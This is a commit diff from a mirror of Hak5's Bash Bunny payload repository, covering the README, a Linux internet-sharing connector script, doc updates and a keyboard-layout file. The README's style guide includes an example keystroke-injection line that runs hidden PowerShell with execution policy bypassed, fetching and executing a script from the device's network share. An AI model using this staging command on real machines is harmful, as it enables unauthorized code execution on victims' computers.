hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/416/head
Darkprince 2024-07-01 10:30:39 +05:30 committed by GitHub
parent 32e41527fb 9aac0c1b74
commit fb77be9253
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
729 changed files with 143657 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@ -1,3 +1,4 @@
.DS_Store
/.project
/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1
bunny_connecter_config.txt

295
README.md
View File

@ -1,9 +1,290 @@
# Payload Library for the Bash Bunny by Hak5
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png)
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
* [Documentation and Wiki](https://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
* IRC: irc.hak5.org #BashBunny
* Discord: https://discord.gg/WuteWPf
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
<div align="center">
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
<br/>
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
</div>
<br/>
<p align="center">
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
<br/>
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
</p>
<div align="center">
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
<br/><br/>
</div>
# Table of contents
<details open>
<ul>
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
</ul>
</details>
## Shop
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
## Getting Started
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
## Documentation / Learn More
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
## Community
*Got Questions? Need some help? Reach out:*
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
## Additional Links
<b> Follow the creators </b><br/>
<p>
<b>Korben's Socials</b><br/>
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
<br/>
<b>Darren's Socials</b><br/>
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
</p>
<br/>
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
<b><div align="center">
<br/>
<br/><br/>
</div></b>
<p align="center">
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
</a>
<br/>
</p>
<p align="center">
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
</p>
## <div align="center">ADVANCED ATTACKS </div>
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone or in combination and more!
<p align="center">
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
</p>
## <div align="center">SIMPLE PAYLOADS </div>
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading em onto the Bash Bunny just as you would any ordinary flash drive.
<p align="center">
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
</p>
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
<p align="center">
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
<br/>
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
<br/>
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
<br/><br/>
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
<br/><br/></i><br/>
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
<br/>
OR
<br/>
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
<br/><br/>
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
<br/>
<i> Payload Studio Themes Preview GIF </i>
<br/><br/>
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
<br/>
<i> Payload Studio Autocomplete Preview GIF </i>
</p>
## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
<p align="center">
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
<br/>
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
</p>
# Please adhere to the following best practices and style guides when submitting a payload.
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
## Naming Conventions
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
## Staged Payloads
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
### Including URLs
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
### Staged Example
**Example scenario: your payload downloads a script and the executes it on a target machine.**
- Include the script in the directory with your payload
- Provide instructions for the user to move the script to the appropriate hosting service.
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
## Payload Configuration
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
In many cases, payloads will require some level of configuration **by the end payload user**.
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
```
Example:
BEGINNING OF PAYLOAD
... Payload Documentation...
# CONFIGURATION
# REQUIRED - Provide URL used for Example
MY_TARGET_URL="example.com"
# OPTIONAL - How long until payload starts; default 5s
BOOT_DELAY="5000"
QUACK DELAY $BOOT_DELAY
...
QUACK STRING $MY_TARGET_URL
...
```
## Payload Documentation
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
```
Example:
BEGINNING OF PAYLOAD
# Title: Example Payload
# Author: Korben Dallas
# Description: Opens hidden powershell and
# Target: Windows 10
# Props: Hak5, Darren Kitchen, Korben
# Version: 1.0
# Category: General
```
### Binaries
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
### Configuration Options
Configurable options should be specified in variables at the top of the payload.txt file
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/quickcreds
### LED
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
# Initialization
LED SETUP
GET SWITCH_POSITION
GET HOST_IP
# Attack
LED ATTACK
ATTACKMODE HID ECM_ETHERNET
### Stages and States
Stages should be documented with comments
# Keystroke Injection Stage
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED STAGE1
ATTACKMODE HID
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
See also:
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
# Disclaimer
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>

321
bunny-connecter.sh Executable file
View File

@ -0,0 +1,321 @@
#!/bin/bash
# Bash Bunny Connector for Linux
# EULA https://www.bashbunny.com/licence/eula.txt
# License https://www.bashbunny.com/licence/software_licence.txt
bbver=1
BBSH_CONFIG="$(dirname $0)/bunny_connecter_config.txt"
if [ "$EUID" -ne 0 ]
then echo "This Bash Bunny Connection script requires root."
sudo su -s "$0"
exit
fi
function banner {
# Show random banner because 1337
b=$(( ( RANDOM % 5 ) + 1 ))
case "$b" in
1)
echo $(tput setaf 3)
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
echo "$(tput sgr0) v$bbver";
;;
2)
echo $(tput setaf 3)
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
echo "$(tput sgr0) v$bbver";
;;
3)
echo $(tput setaf 3)
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
echo "$(tput sgr0) v$bbver";
;;
4)
echo $(tput setaf 3)
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
echo "$(tput sgr0) v$bbver";
;;
5)
echo $(tput setaf 3)
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
echo "$(tput sgr0) v$bbver";
;;
esac
}
function showsettings {
printf "\n\
$(tput bold)Saved Settings$(tput sgr0): Share Internet connection from $sbunnywan\n\
to Bash Bunny at $sbunnylan through default gateway $sbunnygw\n"
}
function menu {
start_clean # removes bunny related rules without doing a full flush
printf "\n\
[$(tput bold)C$(tput sgr0)]onnect using saved settings\n\
[$(tput bold)G$(tput sgr0)]uided setup (recommended)\n\
[$(tput bold)M$(tput sgr0)]anual setup\n\
[$(tput bold)A$(tput sgr0)]dvanced IP settings\n\
[$(tput bold)Q$(tput sgr0)]uit\n\n "
read -r -sn1 key
case "$key" in
[gG]) guidedsetup;;
[mM]) manualsetup;;
[cC]) connectsaved;;
[aA]) advancedsetup;;
[bB]) bunny;;
[qQ]) printf "\n"; start_clean; exit;;
esac
}
function manualsetup {
ipinstalled=$(which ip)
if [[ "$?" == 0 ]]; then
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
printf "\n Select Bash Bunny Interface:\n"
for i in "${!ifaces[@]}"; do
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
done
read -r -p " > " planq
if [ "$planq" -eq "$planq" ] 2>/dev/null; then
sbunnylan=(${ifaces[planq]})
else
printf "\n Response must be a listed numeric option\n"; manualsetup
fi
printf "\n Select Internet Interface:\n"
for i in "${!ifaces[@]}"; do
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
done
read -r -p " > " inetq
if [ "$inetq" -eq "$inetq" ] 2>/dev/null; then
sbunnywan=(${ifaces[inetq]})
else
printf "\n Response must be a listed numeric option\n"; manualsetup
fi
printf "\n$(netstat -nr)\n\n"
read -r -p " Specify Default Gateway IP Address: " sbunnygw
savechanges
else
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"
menu
fi
}
function guidedsetup {
hasiproute2=$(which ip)
if [[ "$?" == 1 ]]; then
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"; menu
fi
hasdefaultroute=$(ip route)
if [[ "$?" == 1 ]]; then
printf "\n No route detected. Check connection and try again.\n"; menu
fi
printf "\n $(tput setaf 3)Step 1 of 3: Select Default Gateway$(tput sgr0)\n\
Default gateway reported as $(tput bold)$(ip route | grep default | awk {'print $3'} | head -1)$(tput sgr0)\n"
read -r -p " Use the above reported default gateway? [Y/n]? " usedgw
case $usedgw in
[yY][eE][sS]|[yY]|'')
sbunnygw=($(ip route | grep default | awk {'print $3'}))
;;
[nN][oO]|[nN])
printf "\n$(ip route)\n\n"
read -r -p " Specify the default gateway by IP address: " sbunnygw
;;
esac
printf "\n $(tput setaf 3)Step 2 of 3: Select Internet Interface$(tput sgr0)\n\
Internet interface reported as $(tput bold)$(ip route | grep default | awk {'print $5'} | head -1)$(tput sgr0)\n"
read -r -p " Use the above reported Internet interface? [Y/n]? " useii
case $useii in
[yY][eE][sS]|[yY]|'')
sbunnywan=($(ip route | grep default | awk {'print $5'}))
;;
[nN][oO]|[nN])
printf "\n Available Network Interfaces:\n"
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
for i in "${!ifaces[@]}"; do
printf " \t%s\t" "${ifaces[$i]}"
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
done
read -r -p " Specify the internet interface by name: " sbunnywan
;;
esac
printf "\n $(tput setaf 3)Step 3 of 3: Select Bash Bunny Interface$(tput sgr0)\n Please connect the Bash Bunny to this computer.\n "
a="0"
until bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en')
do
printf "."
sleep 1
a=$[$a+1]
if [[ $a == "51" ]]; then
printf "\n "
a=0
fi
done
printf "[Checking]"
sleep 5 # Wait as the system is likely to rename interface. Sleeping rather than more advanced error handling becasue reasons.
bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en' | sed 's/://g')
printf "\n Detected Bash Bunny on interface $(tput bold)$bunnyiface$(tput sgr0)\n";
read -r -p " Use the above detected Bash Bunny interface? [Y/n]? " pi
case $pi in
[yY][eE][sS]|[yY]|'')
sbunnylan=$bunnyiface
;;
[nN][oO]|[nN])
printf "\n Available Network Interfaces:\n"
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
for i in "${!ifaces[@]}"; do
printf " \t%s\t" "${ifaces[$i]}"
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
done
read -r -p " Specify the Bash Bunny interface by name: " sbunnylan
;;
esac
savechanges
}
function advancedsetup {
printf "\n\
By default the Bash Bunny resides on the $(tput bold)172.16.64.0/24$(tput sgr0) network\n\
with the IP Address $(tput bold)172.16.64.1$(tput sgr0) and Ethernet default route $(tput bold)172.16.64.64$(tput sgr0).\n\n\
The Bash Bunny expects an Internet connection from 172.16.64.64 by\n\
default, which this script aids in configuring. These IP addresses may\n\
be changed if desired by modifying network configs on the Bash Bunny.\n\n"
read -r -p " Continue with advanced IP config [y/N]? " qcontinue
case $qcontinue in
[nN][oO]|[nN]|'') menu ;;
[yY][eE][sS]|[yY])
read -r -p " Bash Bunny Network [172.16.42.0/24]: " sbunnynet
if [[ $sbunnynet == '' ]]; then
sbunnynet=172.16.64.0/24 # Bash Bunny network. Default is 172.16.64.0/24
fi
read -r -p " Bash Bunny Netmask [255.255.255.0]: " sbunnynmask
if [[ $sbunnynmask == '' ]]; then
sbunnynmask=255.255.255.0 #Default netmask for /24 network
fi
read -r -p " Host IP Address [172.16.42.42]: " sbunnyhostip
if [[ $sbunnyhostip == '' ]]; then
sbunnyhostip=172.16.64.64 #IP Address of host computer
fi
read -r -p " Bash Bunny IP Address [172.16.42.1]: " sbunnyip
if [[ $sbunnyip == '' ]]; then
sbunnyip=172.16.64.1 #If this seems familiar it's becuase I'm just recycling wp6.sh from the WiFi Pineapple
fi
printf "\n Advanced IP settings will be saved for future sessions.\n Default settings may be restored by selecting Advanced IP settings and\n pressing [ENTER] when prompted for IP settings.\n\n Press any key to continue"
savechanges
;;
esac
}
function savechanges {
# using ";" as a delmiter in sed is a-okay
sed -i "s;^sbunnynmask.*;sbunnynmask=$sbunnynmask;" "$BBSH_CONFIG"
sed -i "s;^sbunnynet.*;sbunnynet=$sbunnynet;" "$BBSH_CONFIG"
sed -i "s;^sbunnylan.*;sbunnylan=$sbunnylan;" "$BBSH_CONFIG"
sed -i "s;^sbunnywan.*;sbunnywan=$sbunnywan;" "$BBSH_CONFIG"
sed -i "s;^sbunnygw.*;sbunnygw=$sbunnygw;" "$BBSH_CONFIG"
sed -i "s;^sbunnyhostip.*;sbunnyhostip=$sbunnyhostip;" "$BBSH_CONFIG"
sed -i "s;^sbunnyip.*;sbunnyip=$sbunnyip;" "$BBSH_CONFIG"
sed -i "s;^sfirsttime.*;sfirsttime=0;" "$BBSH_CONFIG"
sfirsttime=0
printf "\n Settings saved.\n"
showsettings
menu
}
function connectsaved {
if [[ "$sfirsttime" == "1" ]]; then
printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
fi
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Bash Bunny
printf "Detecting Bash Bunny..."
until ping $sbunnyip -c1 -w1 >/dev/null
do
printf "."
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up &>/dev/null
sleep 1
done
printf "...found.\n\n"
printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)(\___/)$(tput sgr0)\n"
printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3)(='.'=)$(tput sgr0)\n"
printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)(\")_(\")$(tput sgr0)\n"
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Pineapple
echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
iptables -I FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT #setup IP forwarding
iptables -I FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -I POSTROUTING -t nat -s $sbunnyip -j MASQUERADE
route del default #remove default route
route add default gw $sbunnygw $sbunnywan #add default gateway
printf "\n\n"
exit
}
function start_clean {
# undo all iptables Bashbunny related rules
iptables -D FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT 2>/dev/null
iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 2>/dev/null
iptables -D POSTROUTING -t nat -s $sbunnyip -j MASQUERADE 2>/dev/null
echo '0' > /proc/sys/net/ipv4/ip_forward # Disable forwarding
}
function create_bbsh_config {
echo "sbunnynmask=255.255.255.0" > "$BBSH_CONFIG"
echo "sbunnynet=172.16.64.0/24" >> "$BBSH_CONFIG"
echo "sbunnylan=enx001122334455" >> "$BBSH_CONFIG"
echo "sbunnywan=wlo1" >> "$BBSH_CONFIG"
echo "sbunnygw=192.168.1.1" >> "$BBSH_CONFIG"
echo "sbunnyhostip=172.16.64.64" >> "$BBSH_CONFIG"
echo "sbunnyip=172.16.64.1" >> "$BBSH_CONFIG"
echo "sfirsttime=1" >> "$BBSH_CONFIG"
}
function bunny {
printf "\nNetmask $sbunnynmask\nBunny Net $sbunnynet\nBunny LAN $sbunnylan\nBunny WAN $sbunnywan\nBunny GW $sbunnygw\nBunny IP $sbunnyip\nHost IP $sbunnyhostip\n"
printf "\n/)___(\ \n(='.'=)\n(\")_(\")\n"
exit
}
banner #remove for less 1337
showsettings
# create bbsh_config if it doesn't exist
[ -f "$BBSH_CONFIG" ] || create_bbsh_config
source "$BBSH_CONFIG"
if [[ "$sfirsttime" == "1" ]]; then
printf "
Since this is the first time running the BB Internet Connection Sharing\n\
script, Guided setup is recommended to save initial configuration.\n\
Subsequent sessions may be quickly connected using saved settings.\n"
fi
# Removes iptables rules if the script gets a Ctrl-C
trap start_clean INT
menu

6
docs/readme.txt
View File

@ -6,7 +6,7 @@
Bash Bunny by Hak5 USB Attack/Automation Platform
-+- QUICK REFERENCE GUIDE v1.4 -+-
-+- QUICK REFERENCE GUIDE v1.5 -+-
+-----------------+
@ -107,6 +107,8 @@
$HOST_IP IP Address of the Bash Bunny
(Default: 172.16.64.1)
$SWITCH_POSITION "switch1", "switch2" or "switch3"
$BB_LABEL Volume name of the BashBunny
when mounted.
@ -153,6 +155,8 @@
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
GET HOST_IP Returns $HOST_IP
GET SWITCH_POSITION Returns $SWITCH_POSITION
GET TARGET_OS Returns $TARGET_OS
GET BB_LABEL Returns $BB_LABEL

103
languages/ch.json
View File

@ -165,5 +165,104 @@
"\\":"40,00,64",
"COMMAND-CTRL-SHIFT":"40,00,64",
"COMMAND-CTRL":"40,00,64",
"COMMAND-OPTION-SHIFT'":"40,00,64"
}
"COMMAND-OPTION-SHIFT'":"40,00,64",
"__comment":"Everything below was additionally added by kuyaya",
"GUI-l":"08,00,0f",
"RIGHTSHIFT":"20,00,00",
"A":"20,00,04",
"B":"20,00,05",
"C":"20,00,06",
"D":"20,00,07",
"E":"20,00,08",
"F":"20,00,09",
"G":"20,00,0a",
"H":"20,00,0b",
"I":"20,00,0c",
"J":"20,00,0d",
"K":"20,00,0e",
"L":"20,00,0f",
"M":"20,00,10",
"N":"20,00,11",
"O":"20,00,12",
"P":"20,00,13",
"Q":"20,00,14",
"R":"20,00,15",
"S":"20,00,16",
"T":"20,00,17",
"U":"20,00,18",
"V":"20,00,19",
"W":"20,00,1a",
"X":"20,00,1b",
"Z":"20,00,1c",
"Y":"20,00,1d",
